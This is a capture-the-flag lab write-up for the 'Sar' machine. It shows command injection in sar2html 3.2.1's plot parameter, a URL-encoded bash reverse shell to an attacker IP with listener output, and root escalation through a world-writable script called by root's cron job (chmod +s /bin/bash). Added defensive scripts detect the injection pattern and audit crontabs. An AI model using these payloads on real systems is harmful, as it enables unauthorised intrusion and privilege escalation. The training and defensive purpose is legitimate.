Sar - OSPG


Summary Of Result

The machine is compromised by exploiting a vulnerable version of sar2html. Once we've obtained initial access, we escalate our privileges via root's crontab, which executes a shell script under our control.


Enumeration

Nmap

We will start our scan with nmap.

22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 33:40:be:13:cf:51:7d:d6:a5:9c:64:c8:13:e5:f2:9f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHy/WJJHLFdbwbJpTyRYhEyj2jZV024UPWIdXfNHxq45uh08jkihv3znZ98caLP/pz352c0ZYD31We0bTSbHyjQce2bSAJHubDYp13hU/P4tbV5GIJ72W2rWkLTslH/SJoHUSqlManB7ZzgVyU2KQ4fnNx/V1XGJYsshquRqTrXKeeal+yQvTC4gnsr8ENIGMq0yJnYxMAasx6kmSc+S+065Mie65xkyisFXo2MQyxzsFdCu2w1bYmb3pegYDm6Y0c/EJP0sxDizXVwkUOS0XSVdGuk3RUYjt5GQ2fL24ZsML6CwN+HD2ZTnD0FK90PQTLuvlp6BoI/ZWvIenNvu63
|   256 8a:4e:ab:0b:de:e3:69:40:50:98:98:58:32:8f:71:9e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgxutbLnN4K2tj6ZHzrlzTKS+RRuly+RkA0J63JsQFiwyvz4PqA64w/h0Se3gymZV6zJ9XBpS41b6IoEymeiSA=
|   256 e6:2f:55:1c:db:d0:bb:46:92:80:dd:5f:8e:a3:0a:41 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM+5254x35Vwa2S7X73YLY87Q58qQOD9oQeSKMpmmT0o
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Only two services are exposed on the target: SSH (22) and HTTP (80).

Ffuf

ffuf is used to discover hidden files and directories on a web application. We run it with the -u flag for the URL (the FUZZ keyword marks where each wordlist entry is inserted) and the -w flag for the wordlist. The complete command looks like:

$ ffuf -u http://192.168.123.35/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt
...
index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376]
phpinfo.php             [Status: 200, Size: 95515, Words: 4725, Lines: 1170]
robots.txt              [Status: 200, Size: 9, Words: 1, Lines: 2]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10]

Let's look at the /robots.txt file we just discovered.

$ curl -s 192.168.123.35/robots.txt | html2text
sar2HTML

robots.txt points us to a sar2HTML directory.

Browsing to /sar2HTML/ takes us to the application's index page, which shows its version.

$ curl -s 192.168.123.35/sar2HTML/index.php | html2text


                              sar2html Ver 3.2.1
                             (Donate if you like!)

    * New
    * OS
          o HP-UX
          o Linux
          o SunOS

→ The target system is running sar2html version 3.2.1.

A quick search shows that sar2html 3.2.1 is a vulnerable version with a known Remote Code Execution (RCE) issue.

$ searchsploit sar2html                
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
sar2html 3.2.1 - 'plot' Remote Code Execution                                                                                                               | php/webapps/49344.py
Sar2HTML 3.2.1 - Remote Command Execution                                                                                                                   | php/webapps/47204.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Exploitation

Sar2HTML plot Vulnerability

The plot parameter is vulnerable to command injection: anything appended after a ; separator is executed on the server, so we easily achieve code execution through it.

There are two ways of achieving code execution.

[1.] Manually, with the following payload format:

http://192.168.123.35/sar2HTML/index.php?plot=<OS>;<command-here>

sent with curl (the ; is URL-encoded as %3B):

$ curl -s 192.168.123.35/sar2HTML/index.php?plot=LINUX%3Bwhoami | html2text

[...]

..>There is no defined host...
www-data

[2.] Using the public exploit script.

$ python3 49344.py                                               
Enter The url => http://192.168.123.35/sar2HTML/       
Command => whoami
www-data

Command => id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

It's always a good idea to URL-encode the reverse shell command before sending it in the query string. Our final payload is:

bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.49.123%2F80+0%3E%261%22

If everything works, our nc listener on port 80 catches a reverse shell running as www-data.

$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.49.123] from (UNKNOWN) [192.168.123.35] 43594
bash: cannot set terminal process group (981): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
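Before moving on to privilege escalation, here is the defender's view of the plot injection used above. This is an added example, not code from the original writeup or from the sar2html project: flag_plot_injection() reads Apache access-log lines on stdin and prints the client IP and request path of every request whose plot= value contains a shell metacharacter, raw or URL-encoded, and is_valid_plot() is the allow-list check the application itself should enforce on the parameter (the three values are the OS names shown on the index page; that the app compares them in upper case is an assumption). The log lines are constructed for the example, not captured traffic.

```shell
#!/bin/sh
# Added example (not from the original writeup): detection and mitigation for
# the sar2HTML plot command injection.

# flag_plot_injection: stdin = Apache Combined Log Format lines; stdout = "IP PATH"
# for every request whose plot= value carries ; | ` or $( (raw or URL-encoded as
# %3B %7C %60 %24%28). Case-insensitive so %3b and %3B are both caught; the
# value ends at a space, a quote or a & separator.
flag_plot_injection() {
    grep -Ei 'plot=[^ "&]*([;|`]|%3b|%7c|%60|\$\(|%24%28)' | awk '{ print $1, $7 }'
}

# is_valid_plot VALUE: the allow-list the application should apply before the
# value ever reaches a shell. Assumption: sar2html expects upper-case OS names.
is_valid_plot() {
    case "$1" in
        HP-UX|LINUX|SUNOS) return 0 ;;
        *) return 1 ;;
    esac
}

# Constructed sample log lines (not real captured traffic). The second and
# fourth carry an injected command; the first and third are benign.
SAMPLE_LOG='192.168.49.123 - - [24/Jul/2020:10:00:01 +0000] "GET /sar2HTML/index.php?plot=LINUX HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.49.123 - - [24/Jul/2020:10:00:05 +0000] "GET /sar2HTML/index.php?plot=LINUX%3Bwhoami HTTP/1.1" 200 1300 "-" "curl/7.68.0"
192.168.49.123 - - [24/Jul/2020:10:00:09 +0000] "GET /robots.txt HTTP/1.1" 200 9 "-" "curl/7.68.0"
192.168.49.123 - - [24/Jul/2020:10:00:12 +0000] "GET /sar2HTML/index.php?plot=LINUX;id HTTP/1.1" 200 1300 "-" "curl/7.68.0"'

# Demo: prints the two injected requests.
printf '%s\n' "$SAMPLE_LOG" | flag_plot_injection
```

On a live system the same function runs as `flag_plot_injection < /var/log/apache2/access.log`. The detection is a tripwire, not a fix: the actual mitigation is the allow-list, which rejects `LINUX;whoami` because it is not one of the three permitted values.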

Privilege Escalation

Crontab

There is a cron job on the target that runs as root.

www-data@sar:/var/www/html/sar2HTML$ cat /etc/crontab
cat /etc/crontab

...
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh

→ Every 5 minutes, root changes into the directory /var/www/html and executes ./finally.sh (the sudo is redundant, since the job already runs as root).

Let's inspect ./finally.sh:

www-data@sar:/var/www/html/sar2HTML$ cat /var/www/html/./finally.sh
cat /var/www/html/./finally.sh

#!/bin/sh

./write.sh

finally.sh in turn executes ./write.sh, which turns out to be under our control:

www-data@sar:/var/www/html/sar2HTML$ ls -al /var/www/html/write.sh    
ls -al /var/www/html/write.sh
-rwxrwxrwx 1 www-data www-data 30 Jul 24  2020 /var/www/html/write.sh

Essentially, we can write a payload into /var/www/html/write.sh, wait up to 5 minutes, and root will execute it for us.

The payload might look as follows:

www-data@sar:/var/www/html/sar2HTML$ cat /var/www/html/write.sh
chmod +s /bin/bash

After at most 5 minutes, /bin/bash should carry the SUID bit (chmod +s sets SGID as well, hence rwsr-sr-x below).

www-data@sar:/var/www/html/sar2HTML$ ls -al /bin/bash
ls -al /bin/bash
-rwsr-sr-x 1 root root 1113504 Jun  7  2019 /bin/bash

This means we can get a root shell with bash -p, which keeps the effective UID instead of dropping it:

www-data@sar:/var/www/html/sar2HTML$ bash -p
bash -p

whoami
root
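The root cause of this escalation is a root cron job that runs a script chain in a directory writable by www-data. The audit below is an added example, not part of the original writeup or of any tool on the box: audit_crontab() reads /etc/crontab-style lines, follows one level of ./other.sh calls inside each root-run script (finally.sh only delegates to write.sh), and reports every script that is group- or world-writable or sits in such a directory. It assumes GNU stat (-c '%a') and that a job without an explicit "cd DIR &&" prefix runs from /root; the crontab line and files in the demo are constructed to mirror the layout found on the target.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit an /etc/crontab-style
# file for root jobs whose script, or a script it calls, can be modified by
# other users. Assumes GNU stat and cron's default HOME of /root.

# perm_writable OCTAL -> succeeds if the group or world write bit is set.
perm_writable() {
    m=$(( 0$1 ))                               # leading 0: parse as octal
    [ $(( (m >> 3) & 2 )) -ne 0 ] || [ $(( m & 2 )) -ne 0 ]
}

# check_script PATH -> prints "PATH WRITABLE|OK|MISSING". A writable parent
# directory counts as well, since the file could simply be replaced.
check_script() {
    if [ ! -e "$1" ]; then
        echo "$1 MISSING"
    elif perm_writable "$(stat -c '%a' "$1")" || perm_writable "$(stat -c '%a' "$(dirname "$1")")"; then
        echo "$1 WRITABLE"
    else
        echo "$1 OK"
    fi
}

# resolve_script TOKEN DIR -> absolute path of a script token relative to DIR.
resolve_script() {
    case "$1" in
        /*)  echo "$1" ;;
        ./*) echo "$2/${1#./}" ;;
        *)   echo "$2/$1" ;;
    esac
}

# audit_crontab: stdin = crontab lines (min hour dom mon dow user command).
audit_crontab() {
    while read -r min hour dom mon dow user cmd; do
        case "$min" in
            ''|'#'*|[A-Za-z_]*=*) continue ;;      # blank, comment or VAR=value line
        esac
        [ "$user" = "root" ] || continue
        set -f; set -- $cmd; set +f                # split the command without globbing
        dir=/root                                  # assumption: cron's default HOME for root
        if [ "$1" = "cd" ] && [ "$3" = "&&" ]; then
            dir="${2%/}"; shift 3                  # honour a leading "cd DIR &&"
        fi
        for tok in "$@"; do
            case "$tok" in
                *.sh)
                    script=$(resolve_script "$tok" "$dir")
                    check_script "$script"
                    # Follow one level: scripts invoked as ./name.sh from inside.
                    [ -r "$script" ] && grep -o '\./[A-Za-z0-9_.-]*\.sh' "$script" |
                        while read -r sub; do
                            check_script "$(resolve_script "$sub" "$(dirname "$script")")"
                        done
                    ;;
            esac
        done
    done
}

# Demo on constructed files: a 0755 finally.sh that calls a 0777 write.sh, with
# a crontab line shaped like the one found on the target.
demo_audit() {
    tmp=$(mktemp -d)
    printf '#!/bin/sh\n./write.sh\n' > "$tmp/finally.sh"
    printf 'echo constructed placeholder\n' > "$tmp/write.sh"
    chmod 755 "$tmp/finally.sh"
    chmod 777 "$tmp/write.sh"
    printf '*/5  *    * * *   root    cd %s/ && sudo ./finally.sh\n' "$tmp" | audit_crontab
    rm -rf "$tmp"
}
demo_audit
```

Run as `audit_crontab < /etc/crontab` on a live host; on the box above it would report /var/www/html/write.sh as WRITABLE. The fix is to keep root-run scripts root-owned with mode 0755 in a directory the web user cannot write to, and to drop the pointless sudo.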